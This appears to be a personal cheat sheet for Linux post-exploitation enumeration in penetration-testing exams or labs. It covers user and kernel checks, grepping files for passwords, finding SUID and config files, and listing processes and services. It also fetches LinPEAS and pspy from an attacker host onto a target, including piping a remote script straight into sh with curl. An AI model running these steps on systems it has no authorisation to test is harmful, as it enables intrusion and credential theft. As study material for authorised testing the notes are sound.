┌──(ntaheij㉿kali)-[~]
└─$ whoami
ntaheij
or alternatively use id to see more information about your uid and which groups you are in:
┌──(ntaheij㉿kali)-[~]
└─$ id
uid=1000(ntaheij) gid=1000(ntaheij) groups=1000(ntaheij),27(sudo)
Read the /etc/passwd file to see a list of users on the box:
$ cat /etc/passwd
Many of these users will relate to certain services, and not be a real person. Look for real users by filtering by those with a real login shell:
$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
ntaheij:x:1000:1000:ntaheij,,,:/home/ntaheij:/bin/bash
┌──(ntaheij㉿kali)-[~]
└─$ uname -a
Linux kali 5.10.0-kali5-amd64 #1 SMP Debian 5.10.24-1kali1 (2021-03-23) x86_64 GNU/Linux
What does this mean?
The kernel is a central part of the operating system. This command tells you about the distribution (Kali Linux), the version, and the word size (x86_64, i.e. 64-bit)
This command concatenates the contents of any readable files in the current working directory:
$ cat */*
It can be combined with a grep to look for passwords, for example:
$ cat */* | grep pass
However, it is not particularly efficient on a large number of files - try to use it within a specific directory
Find files by user ownership (from this post)
$ find / -user userX
Find files by group ownership (from this post)
$ find / -group groupX
Find config files and redirect errors:
$ find / -name '*.conf' 2>/dev/null
Find suid files:
$ find . -perm /4000
Exclude a filename or other query with the -not or ! operator:
$ find . -not -name "*.exe"
#exclude directories and files beginning with "sys"
$ find /var ! -name "sys*" ! -type d
As always, filter your output with grep if your find command is not granular enough:
# anything with "backup" in the name
$ find / -type f | grep backup
#get rid of stuff from /proc and /var/lib
$ find / -user user | grep -v 'proc\|var/lib'
#get rid of error messages (useful if the > operator doesn't work in a shell)
$ find / -user user | grep -v 'Permission denied'
You can even use regex in your find command with the -regex flag:
$ find ./ ! -regex '.*\(deb\|vmdk\)$'
Or use logical operators like -o (logical OR):
$ find /media/d/ -type f -size +50M ! \( -name "*deb" -o -name "*vmdk" \)
(both of the above examples from https://unix.stackexchange.com/questions/50612/how-to-combine-2-name-conditions-in-find#)
Install Linpeas from GitHub
–
IMPORTANT UPDATE: on 22/04/21 @_superhero1 on twitter revealed they failed OSCP because of a linpeas auto exploit regarding sudo tokens. They were eventually awarded the revoked points, but OffSec made it clear they would not be lenient in future. The offending auto exploit feature was removed, but you must make sure you use the fixed version of LinPeas, which has been confirmed by OffSec to be exam safe.
–
Placing linpeas.sh in ~/Documents/enum allows you to easily retrieve it with a simple python server. See [[Aliases#Useful Aliases |
Useful Aliases]] for enumserve alias setup instructions. |
On attacker ntaheijhine:
$ enumserve
Find your IP address ([[Linux Networking#Get your IP]])
On target ntaheijhine:
$ wget [IP]:8000/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh
You can also send it directly to sh/bash if wget is not installed:
$ curl 10.10.14.53:8000/linpeas.sh | sh
Sometimes firewall rules may prevent you from accessing port 8000 - try running the server on port 80 if you aren’t getting any results (requires root permissions):
$ sudo python3 -m http.server 80
/home
/var/www
/var/backups
/var/logs
/opt
/usr/share
/usr/share/local
List processes:
$ ps aux
Pspy monitoring:
$ wget [IP]:8000/pspy64
$ chmod +x pspy64
$ ./pspy64
List services:
$ netstat
$ ss -lntp
$ systemctl list-units --type=service --state=running
Why is this useful?
#cheat-sheet #enum #unix